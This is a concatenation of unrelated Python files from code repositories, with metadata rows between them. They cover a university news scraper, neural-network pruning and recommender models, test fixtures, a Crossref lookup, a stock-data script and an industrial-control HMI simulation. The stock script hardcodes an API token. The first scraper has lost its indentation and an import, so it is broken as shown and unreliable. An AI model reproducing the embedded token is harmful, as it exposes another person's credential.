from lxml import etree
import re
import pdfkit
from PyPDF2 import PdfFileMerger
import os
# 敏感词过滤类,AC自动机
import Ac_auto
# pdfkit配置
confg = pdfkit.configuration(wkhtmltopdf=r'C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe')
# 伪装http请求头部
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;'
}
def get_url_info(url_list):
# 新闻数累加器
sum_i = 0
# 获取新闻栏目名
news_heading = 'Test1'
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
# now_dir = os.getcwd()
new_dir = 'D:\\PycharmProjects\\zzu_spider' + '\\' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# print(new_dir)
# 合并pdf
merger = PdfFileMerger()
# 对每页的每个新闻做处理
for i, url in enumerate(url_list):
# for j in range(0, 50):
# 将新闻标题+内容整合,保存为字典
j = 0
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
tips = '获取{}栏目下第{}页第{}条新闻,总第{}条新闻......'.format(news_heading, i + 1, j + 1, sum_i + 1)
print(tips)
# 引入tips, 查找爬虫出错未爬取到的空的新闻内容
try:
raw_html = r.text
print(raw_html)
html_filter = sensitive_word_filter(raw_html)
pdfkit.from_string(raw_html, new_dir + '\\' + tips[2:-6] + '.pdf', configuration=confg)
# 合并pdf
pdf_file = new_dir + '\\' + tips[2:-6] + '.pdf'
merger.append(open(pdf_file, 'rb'))
print(merger)
sum_i += 1
except:
continue
with open('test1111' + '.html', 'w+') as f1:
f1.write(raw_html)
# 合并pdf
merger.write(new_dir + '\\' + '合并test.pdf')
print('{}栏目pdf合并完成'.format(news_heading))
# 获取具体一条新闻的内容
# def get_url_content(news_url, tips):
# r = requests.get(news_url, headers=headers)
# r.encoding = 'UTF-8'
# sub_html = etree.HTML(r.text)
# # 对内容做处理,删除空格换行转义等等字符,并进行关键词校验屏蔽
# # 关键字的校验屏蔽。(关键字:指的是反动言论,不文明词汇)
# content = sub_html.xpath('//*[@id="bok_0"]/div[@class="zzj_5"]//text()')
# content = ''.join(content)
# content = re.sub(r'\s', '', content)
#
# # print(content)
# content = sensitive_word_filter(content)
#
# # 如果出现空的内容,输出具体出错的新闻位置并生成txt
# if content == '':
# with open('C:/Users/mcgra/Desktop/spider_error.txt', 'a+') as f1:
# f1.write(tips)
# f1.write('\n')
#
# return content
# 敏感词过滤
def sensitive_word_filter(content):
ah = Ac_auto.ac_automation()
path = 'sensitive_words.txt'
ah.parse(path)
content = ah.words_replace(content)
# text1 = "新疆骚乱苹果新品发布会"
# text2 = ah.words_replace(text1)
# print(text1)
# print(text2)
return content
def main():
# 郑大新闻网所有的栏目链接
# all_urls = all_urls_list()
# for url in all_urls:
# url_list = get_url_list(url)
url = ['http://news.zzu.edu.cn/', 'http://www16.zzu.edu.cn/msgs/vmsgisapi.dll/vmsglist?mtype=x&lan=203']
get_url_info(url)
if __name__ == '__main__':
main()
| 26.365217 | 108 | 0.592678 |
40e689f3bf0f871bc6b25864ef1919cb2cf0d5a0
| 4,665 |
py
|
Python
|
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | null | null | null |
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | null | null | null |
models/criterions/CROPStructured.py
|
scott-mao/CroP
|
f1e0a25224e341683cf47e7ce451ce0fe996e950
|
[
"MIT"
] | 1 |
2021-11-08T16:34:45.000Z
|
2021-11-08T16:34:45.000Z
|
import copy
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.functional as F
from models.criterions.SNAP import SNAP
from utils.constants import SNIP_BATCH_ITERATIONS
from collections import OrderedDict
from tqdm import tqdm
from models.networks.ResNext import ResNext
class CROPStructured(SNAP):
def __init__(self, *args, **kwargs):
super(CROPStructured, self).__init__(*args, **kwargs)
def get_prune_indices(self, *args, **kwargs):
raise NotImplementedError
def get_grow_indices(self, *args, **kwargs):
raise NotImplementedError
def get_weight_saliencies(self, train_loader):
# copy network
self.model = self.model.cpu()
net = copy.deepcopy(self.model)
net = net.to(self.device)
net = net.eval()
# insert c to gather elasticities
self.insert_governing_variables(net)
iterations = SNIP_BATCH_ITERATIONS
if isinstance(self.model, ResNext):
iterations = 2
device = self.device
self.their_implementation(device, iterations, net, train_loader)
# gather elasticities
grads_abs = OrderedDict()
grads_abs2 = OrderedDict()
for name, layer in net.named_modules():
if "Norm" in str(layer): continue
name_ = f"{name}.weight"
if hasattr(layer, "gov_in"):
for (identification, param) in [(id(param), param) for param in [layer.gov_in, layer.gov_out] if
param.requires_grad]:
try:
grad_ab = torch.abs(param.grad.data)
except:
grad_ab = torch.zeros_like(param.data)
grads_abs2[(identification, name_)] = grad_ab
if identification not in grads_abs:
grads_abs[identification] = grad_ab
# reset model
net = net.cpu()
del net
self.model = self.model.to(self.device)
self.model = self.model.train()
all_scores = torch.cat([torch.flatten(x) for _, x in grads_abs.items()])
norm_factor = 1
all_scores.div_(norm_factor)
log10 = all_scores.sort().values.log10()
return all_scores, grads_abs2, log10, norm_factor, [x.shape[0] for x in grads_abs.values()]
def their_implementation(self, device, iterations, net, train_loader):
net.zero_grad()
weights = []
for layer in net.modules():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):
weights.append(layer.weight)
inputs_one = []
targets_one = []
grad_w = None
grad_f = None
for w in weights:
w.requires_grad_(True)
dataloader_iter = iter(train_loader)
for it in tqdm(range(iterations)):
inputs, targets = next(dataloader_iter)
N = inputs.shape[0]
din = copy.deepcopy(inputs)
dtarget = copy.deepcopy(targets)
start = 0
intv = N
while start < N:
end = min(start + intv, N)
inputs_one.append(din[start:end])
targets_one.append(dtarget[start:end])
outputs = net.forward(inputs[start:end].to(device)) # divide by temperature to make it uniform
loss = F.cross_entropy(outputs, targets[start:end].to(device))
grad_w_p = autograd.grad(loss, weights, create_graph=False)
if grad_w is None:
grad_w = list(grad_w_p)
else:
for idx in range(len(grad_w)):
grad_w[idx] += grad_w_p[idx]
start = end
for it in tqdm(range(len(inputs_one))):
inputs = inputs_one.pop(0).to(device)
targets = targets_one.pop(0).to(device)
outputs = net.forward(inputs) # divide by temperature to make it uniform
loss = F.cross_entropy(outputs, targets)
grad_f = autograd.grad(loss, weights, create_graph=True)
z = 0
count = 0
for name, layer in net.named_modules():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):
if grad_w[count].is_cuda:
z += (grad_w[count] * grad_f[count] * self.model.mask[name + ".weight"]).sum()
else:
z += (grad_w[count] * grad_f[count] * self.model.mask[name + ".weight"].cpu()).sum()
count += 1
z.backward()
| 38.553719 | 112 | 0.568489 |
734c2b5ae2abdc64ff9839fcb7fbe0ab5e183499
| 2,386 |
py
|
Python
|
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/translator_directory/conftest.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import pytest
import transaction
from onegov.fsi.initial_content import create_new_organisation
from onegov.translator_directory import TranslatorDirectoryApp
from onegov.user import User
from sqlalchemy.orm.session import close_all_sessions
from tests.onegov.fsi.common import global_password
from tests.onegov.fsi.common import hashed_password as _hashed_password
from tests.shared import Client as BaseClient
from tests.shared.utils import create_app
class Client(BaseClient):
use_intercooler = True
skip_first_form = True
def login_member(self, to=None):
return self.login('[email protected]', global_password, to)
@pytest.fixture(scope='session')
def plain_password():
return global_password
@pytest.fixture(scope='session')
def hashed_password():
return _hashed_password
@pytest.fixture(scope='function')
def translator_app(request, hashed_password):
yield create_translator_app(request, False, hashed_password)
@pytest.fixture(scope='function')
def es_translator_app(request, hashed_password):
yield create_translator_app(request, True, hashed_password)
@pytest.fixture(scope='function')
def client(translator_app):
return Client(translator_app)
@pytest.fixture(scope='function')
def client_with_es(es_translator_app):
return Client(es_translator_app)
def create_translator_app(request, use_elasticsearch, hashed_password):
app = create_app(
app_class=TranslatorDirectoryApp,
request=request,
use_elasticsearch=use_elasticsearch
)
session = app.session()
org = create_new_organisation(app, name="Übersetzerverzeichnis")
org.meta['reply_to'] = '[email protected]'
org.meta['locales'] = 'de_CH'
# usually we don't want to create the users directly, anywhere else you
# *need* to go through the UserCollection. Here however, we can improve
# the test speed by not hashing the password for every test.
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='admin'
))
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='editor'
))
session.add(User(
username='[email protected]',
password_hash=hashed_password,
role='member'
))
transaction.commit()
close_all_sessions()
return app
| 25.934783 | 75 | 0.738894 |
488ad88797574037e51f67373c4e4268ce37fac8
| 1,749 |
py
|
Python
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/crossref_prefix.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import csv
import os
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
import xml.etree.ElementTree as ET
import openapc_toolkit as oat
def get_prefix(doi):
url = 'http://data.crossref.org/' + doi
req = Request(url)
req.add_header("Accept", "application/vnd.crossref.unixsd+xml")
try:
response = urlopen(req)
content_string = response.read()
root = ET.fromstring(content_string)
result = root.findall(".//cr_qr:crm-item[@name='prefix-name']", {"cr_qr": "http://www.crossref.org/qrschema/3.0"})
return result[0].text
except HTTPError as httpe:
code = str(httpe.getcode())
return "HTTPError: {} - {}".format(code, httpe.reason)
except URLError as urle:
return "URLError: {}".format(urle.reason)
except ET.ParseError as etpe:
return "ElementTree ParseError: {}".format(str(etpe))
parser = argparse.ArgumentParser()
parser.add_argument("doi_or_file", help="An OpenAPC-compatible CSV file or a single DOI to look up in crossref.")
args = parser.parse_args()
arg = args.doi_or_file
if os.path.isfile(arg):
csv_file = open(arg, "r", encoding="utf8")
reader = csv.reader(csv_file)
line_number = 0
for line in reader:
if not line:
prefix = ""
else:
prefix = get_prefix(line[3])
result = str(line_number) + ": " + prefix
if prefix == "Springer (Biomed Central Ltd.)":
oat.print_g(result)
elif prefix == "Nature Publishing Group":
oat.print_r(result)
else:
print(result)
line_number += 1
else:
print(get_prefix(arg))
| 31.8 | 122 | 0.635792 |
81912187703995cb49b326d91df0a6435766b901
| 470 |
py
|
Python
|
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | 2 |
2021-03-25T22:00:07.000Z
|
2022-01-20T15:51:48.000Z
|
stock_tushare/com/aaron/app.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
import tushare as ts
token = '19c3a898e510a566d1bed1df579407af9bdf9bf0c3255f1eac99c05b';
if __name__ == "__main__":
print(ts.__version__)
ts.set_token(token)
pro = ts.pro_api()
# df = pro.trade_cal(exchange='', start_date='20200701', end_date='20200723',
# fields='exchange,cal_date,is_open,pretrade_date', is_open='0')
df = pro.query('daily', ts_code='600522.SH', start_date='20200701', end_date='20200723')
print(df)
| 31.333333 | 92 | 0.678723 |
c48cda6a9ab75b8816320908941c4bac1a51d758
| 6,437 |
py
|
Python
|
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | 2 |
2020-06-24T13:01:22.000Z
|
2020-06-24T13:10:07.000Z
|
Praxisseminar/hmi.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
"""
IN BEARBEITUNG
Zuletzt 06.07. : Hinzufuegen von HMI Protokolldaten
Praxisseminar hmi.py
"""
from minicps.devices import HMI
from utils import Praxisseminar_test_logger
from utils import STATE, PLC1_ADDR
from utils import HMI_PROTOCOL, HMI_DATA, HMI_ADDR
import time
MOTOR = ('MOTOR', 1)
SENSOR = ('SENSOR', 1)
class PHMI(HMI):
"""Praxisseminar HMI.
HMI:
- Man kann die Daten des Motors von der PLC ablesen
- Man kann die PLC bedienen (ein-/ausschalten + Geschwindigkeit veraendern)
"""
def main_loop(self, sleep=10):
"""HMI main
"""
while True:
Praxisseminar_test_logger.debug("Die HMI mit Adresse " + str(HMI_ADDR) + " befindet sich in der main loop")
print "Sie haben folgende Optionen: "
print
eingabe = int(raw_input("Auslesen Status: Taste 1/ Geschwindigkeit einstellen: Taste 2/ Ein-/Ausschalten: Taste 3/ Programm beenden: Taste 99 "))
print 'DEBUG: eingabe = %s' % eingabe
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(eingabe))
# Status abfragen
if eingabe == 1:
Praxisseminar_test_logger.debug("User befindet sich in der ersten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.info('Motor erhaelt von PLC1_ADDR: ' + motor)
if motor == '1':
print 'DEBUG plc1 motor: An'
Praxisseminar_test_logger.info("Der Motor ist An")
elif motor == '0':
print 'DEBUG plc1 motor: Aus'
Praxisseminar_test_logger.info("Der Motor ist Aus")
# Geschwindigkeit einstellen
elif eingabe == 2:
Praxisseminar_test_logger.debug("User befindet sich in der zweiten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.info('Motor erhaelt von PLC1_ADDR: ' + motor)
# siehe Eingabe '1'
if motor == '1':
Praxisseminar_test_logger.info("Der Motor ist an")
sensor = self.receive(SENSOR, PLC1_ADDR)
print 'DEBUG plc1 motor: An mit der Geschwindigkeit' + sensor
Praxisseminar_test_logger.info('Sensor erhaelt von PLC1_ADDR: ' + sensor)
# Wollen Sie die Geschwindigkeit veraendern? Wie hoch soll die Geschwindigkeit sein (Rahmen der Geschwindigkeit anpassen)
change = raw_input("Wollen Sie die Geschwindigkeit veraendern? J/N")
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % change)
if change == "J" or change == "j":
new_vel = float(raw_input("Geben Sie die neue Geschwindigkeit ein: "))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(new_vel))
self.send(SENSOR, new_vel, PLC1_ADDR)
print 'DEBUG plc1 motor: An mit neuer Geschwindigkeit' + str(new_vel)
Praxisseminar_test_logger.info('HMI sendet folgende SENSOR-Daten an PLC1_ADDR: ' + str(new_vel))
elif change == "N" or change == "n":
Praxisseminar_test_logger.debug("Elif-Abfrage wurde erreicht weil User ein N/n eingegeben hat")
continue
elif motor == '0':
print 'DEBUG plc1 motor: Aus'
Praxisseminar_test_logger.info("Der Motor ist aus")
print
# Ein oder ausschalten
elif eingabe == 3:
Praxisseminar_test_logger.debug("User befindet sich in der dritten if-Abfrage")
motor = self.receive(MOTOR, PLC1_ADDR)
print "DEBUG plc1 erhaelt motor: " + motor
Praxisseminar_test_logger.debug('Motor erhaelt von PLC1_ADDR: ' + motor)
if motor == '1':
Praxisseminar_test_logger.info("Der Motor ist an")
onoff = int(raw_input("Wollen Sie den Motor auschalten? Bitte geben Sie 0 ein ansonsten 1"))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(onoff))
if onoff == 0:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
self.send(SENSOR, 0.0, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende SENSOR-Daten an PLC1_ADDR: ' + str(0.0))
Praxisseminar_test_logger.debug('Da der Motor ausgeschaltet wurde wird die Geschwindigkeit des Foerderbandes auf 0.0 zurueckgesetzt')
elif onoff == 1:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif motor == '0':
Praxisseminar_test_logger.info("Der Motor ist aus")
onoff = int(raw_input("Wollen Sie den Motor einschalten? Bitte geben Sie 1 ein ansonsten 0"))
Praxisseminar_test_logger.debug("Der User hat folgendes eingegeben: %s" % str(onoff))
if onoff == 0:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif onoff == 1:
self.send(MOTOR, onoff, PLC1_ADDR)
Praxisseminar_test_logger.info('HMI sendet folgende MOTOR-Daten an PLC1_ADDR: ' + str(onoff))
elif eingabe == 99:
print 'DEBUG: HMI Shutdown'
Praxisseminar_test_logger.debug('DEBUG: HMI Shutdown')
break
time.sleep(sleep)
if __name__ == "__main__":
# notice that memory init is different form disk init
phmi = PHMI(
name='phmi',
state=STATE,
protocol=HMI_PROTOCOL,
memory=HMI_DATA,
disk=HMI_DATA)
| 42.629139 | 157 | 0.57822 |
6ffef31ee2bd6fb24ea4b186bbdce561fbfde897
| 3,262 |
py
|
Python
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/gnn/dgcn/src/dgcn.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""DGCN Network."""
import numpy as np
from mindspore import nn
from mindspore.ops import operations as P
from mindspore import Tensor
from mindspore.nn.layer.activation import get_activation
def glorot(shape):
"""Randomly generated weight."""
W = np.asarray(
np.random.RandomState(1234).uniform(
low=-np.sqrt(6. / (shape[0]+shape[1])),
high=np.sqrt(6. / (shape[0]+shape[1])),
size=(shape[0], shape[1])
), dtype=np.float32)
return Tensor(W)
class GraphConvolution(nn.Cell):
"""Graph convolutional layer."""
def __init__(self,
feature_in_dim,
feature_out_dim,
dropout_ratio=None,
activation=None,
):
super(GraphConvolution, self).__init__()
self.in_dim = feature_in_dim
self.out_dim = feature_out_dim
self.weight_init = glorot([self.out_dim, self.in_dim])
self.fc = nn.Dense(self.in_dim,
self.out_dim,
weight_init=self.weight_init,
has_bias=False)
self.dropout_flag = False
self.dropout_ratio = dropout_ratio
if self.dropout_ratio is not None:
self.dropout_flag = self.dropout_ratio
self.dropout = nn.Dropout(keep_prob=1-self.dropout_ratio)
self.activation = get_activation(activation)
self.activation_flag = self.activation is not None
self.matmul = P.MatMul()
def construct(self, adj, input_feature):
"""Convolutional operations."""
dropout = input_feature
if self.dropout_flag:
dropout = self.dropout(dropout)
fc = self.fc(dropout)
output_feature = self.matmul(adj, fc)
if self.activation_flag:
output_feature = self.activation(output_feature)
return output_feature
class DGCN(nn.Cell):
"""Generate DGCN model."""
def __init__(self, input_dim, hidden_dim, output_dim, dropout):
super(DGCN, self).__init__()
self.layer0 = GraphConvolution(input_dim, hidden_dim, activation='relu', dropout_ratio=dropout)
self.layer1 = GraphConvolution(hidden_dim, output_dim, dropout_ratio=dropout)
def construct(self, adj, ppmi, feature):
Softmax = nn.Softmax()
diffoutput0 = self.layer0(adj, feature)
diffoutput1 = Softmax(self.layer1(adj, diffoutput0))
ppmioutput0 = self.layer0(ppmi, feature)
ppmioutput1 = Softmax(self.layer1(ppmi, ppmioutput0))
return diffoutput1, ppmioutput1
| 37.494253 | 103 | 0.634273 |
73ca152e00ed8e1d2f0d4030182a44e93bce502f
| 588 |
py
|
Python
|
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
examples/basic/session.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
from warp import Graph, Workspace
from warp.globals import register_graph
from warp.constants import WARP_LOGO
from warp import log
from example import A, B, C, D
@register_graph('build-graph-example')
def build_graph() -> Graph:
return Graph() @ A + B + C + D
### Header
print(WARP_LOGO)
### Info
ws = Workspace(graph='build-graph-example')
log.info('Your workspace is now loaded as `ws`.')
log.info(f'Cache directory: {ws.home.path}/{ws.home.session_id}')
log.info('Do `ws.methods` to see available commands. Do `help(ws.[METHOD NAME])` for further information.')
print()
| 25.565217 | 107 | 0.717687 |
fb943851be8a90d70d11431fe85dba6b4110fcac
| 392 |
py
|
Python
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/ineedstudent/migrations/0002_hospital_max_mails_per_day.py
|
n-hackert/match4healthcare
|
761248c27b49e568c545c643a72eac9a040649d7
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.4 on 2020-03-29 20:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ineedstudent', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='hospital',
name='max_mails_per_day',
field=models.IntegerField(default=200),
),
]
| 20.631579 | 51 | 0.604592 |
5439d4d85434223c03b87f557e495f96b59f51db
| 12,273 |
py
|
Python
|
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | 1 |
2022-02-17T12:28:38.000Z
|
2022-02-17T12:28:38.000Z
|
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | null | null | null |
item_recommender.py
|
xrb92/R3S
|
bc39fd90bb3f3cec195d69bebce61e7cd91243df
|
[
"Apache-2.0"
] | null | null | null |
'''
Item Recommender
April 2021
[email protected]
'''
import os
import sys
import math
import datetime
import numpy as np
import tensorflow as tf
from layer_util import *
from data_reader import DataReader
from hyper_param import param_dict as pd
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.compat.v1.disable_eager_execution()
###### global variable for local computation ######
g_loss_sum = 0.
g_loss_cnt = 0
g_working_mode = 'local_train'
g_training = False
g_dr = DataReader(pd['batch_size'])
class ItemRecommender(object):
def __init__(self):
#placeholder
self.sph_user = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_user')
self.sph_doc = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_doc')
self.sph_con = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_con')
self.sph_seed = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_seed')
self.sph_ig = tf.compat.v1.sparse_placeholder(tf.int32, name='sph_ig')
self.ph_dwell_time = tf.compat.v1.placeholder(tf.float32, name='ph_dwell_time')
self.create_graph('m3oe')
diff = tf.reshape(self.ph_dwell_time, [-1]) - tf.reshape(self.output, [-1])
self.loss = tf.reduce_mean(tf.square(diff))
vs = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, scope='m3oe')
self.grads = tf.clip_by_global_norm(tf.gradients(self.loss, vs), pd['grad_clip'])[0]
with tf.compat.v1.variable_scope('opt'):
optimizer = tf.compat.v1.train.AdamOptimizer(pd['lr'])
self.opt = optimizer.apply_gradients(zip(self.grads, vs))
def field_interact(self, fields):
global g_training
qkv = tf.compat.v1.layers.dropout(fields, rate=pd['dropout'], training=g_training)
with tf.compat.v1.variable_scope('fi'):
return multihead_attention(queries = qkv,
keys = qkv,
values = qkv,
num_heads = pd['head_num'],
dropout_rate = pd['dropout'],
training = g_training,
causality = False,
scope='mha')
def create_graph(self, scope):
global g_training, g_dr
with tf.compat.v1.variable_scope(scope, reuse=tf.compat.v1.AUTO_REUSE):
feat_dict = get_embeddings(g_dr.unique_feature_num(),
pd['feat_dim'],
scope='feat_embedding',
zero_pad=False)
n_batch = pd['batch_size']
n_user, n_doc, n_con = pd['user_field_num'], pd['doc_field_num'], pd['con_field_num']
embed_dim = pd['feat_dim']
user_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_user, sp_weights=None, combiner='mean')
self.user = tf.reshape(user_embed, shape=[n_batch, n_user, embed_dim])
doc_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_doc, sp_weights=None, combiner='mean')
self.doc = tf.reshape(doc_embed, shape=[n_batch, n_doc, embed_dim])
con_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_con, sp_weights=None, combiner='mean')
self.con = tf.reshape(con_embed, shape=[n_batch, n_con, embed_dim])
seed_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_seed, sp_weights=None, combiner='mean')
self.seed = tf.reshape(seed_embed, shape=[n_batch, n_doc, embed_dim])
ig_embed = tf.nn.embedding_lookup_sparse(feat_dict, self.sph_ig, sp_weights=None, combiner='mean')
self.ig = tf.reshape(ig_embed, shape=[n_batch, n_doc, embed_dim])
fi_in = tf.concat([self.doc, self.seed], axis = 1)
#feature interaction network
fi_expert = tf.reshape(self.field_interact(fi_in), shape = [n_batch, -1])
fi_expert = tf.concat([fi_expert,
tf.reshape(self.user, shape=[n_batch, -1]),
tf.reshape(self.con, shape=[n_batch, -1])], axis = 1)
fi_expert = tf.compat.v1.layers.dense(fi_expert, fi_expert.get_shape().as_list()[-1], activation=tf.nn.relu)
fi_expert = tf.compat.v1.layers.dense(fi_expert, pd['expert_dim'], activation=tf.nn.relu)
#sys.exit(0)
edc = tf.reshape(self.doc, shape=[-1, embed_dim])
esd = tf.reshape(self.seed, shape=[-1, embed_dim])
#similarity network
smn0 = tf.multiply(edc, esd)
smn1 = tf.compat.v1.reduce_sum(tf.multiply(edc, esd), axis = 1, keep_dims=True)
smn = tf.reshape(tf.concat([smn0, smn1], axis=1), shape=[n_batch, -1])
sim_expert = tf.concat([smn,
tf.reshape(self.user, shape=[n_batch, -1]),
tf.reshape(self.con, shape=[n_batch, -1])], axis = 1)
sim_expert = tf.compat.v1.layers.dense(sim_expert, pd['expert_dim'], activation=tf.nn.relu)
#information gain network
ig_expert = tf.concat([tf.reshape(self.ig, [n_batch, -1]),
tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
ig_expert = tf.compat.v1.layers.dense(ig_expert, pd['expert_dim'], activation=tf.nn.relu)
#multi-ciritic
gate_in = tf.concat([tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.seed, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
experts = tf.stack([fi_expert, sim_expert, ig_expert], axis = 1)
gates, votes = [], []
for i in range(pd['critic_num']):
gates.append(tf.nn.softmax(tf.compat.v1.layers.dense(gate_in, pd['expert_num'])))
gates[i] = tf.reshape(gates[i], [n_batch, pd['expert_num'], 1])
votes.append(tf.reduce_sum(gates[i] * experts, axis = 1))
votes = tf.stack(votes, axis = 1)
#attention layer
w_init=tf.compat.v1.truncated_normal_initializer(stddev=0.01)
att_x = tf.concat([tf.reshape(self.user, [n_batch, -1]),
tf.reshape(self.doc, [n_batch, -1]),
tf.reshape(self.seed, [n_batch, -1]),
tf.reshape(self.con, [n_batch, -1])], axis = 1)
att_w = tf.compat.v1.get_variable('att_w', (pd['expert_dim'], att_x.get_shape().as_list()[-1]), initializer = w_init)
att_o = tf.tensordot(votes, att_w, [[2],[0]])
att_x = tf.tile(tf.expand_dims(att_x, 1), [1, pd['critic_num'], 1])
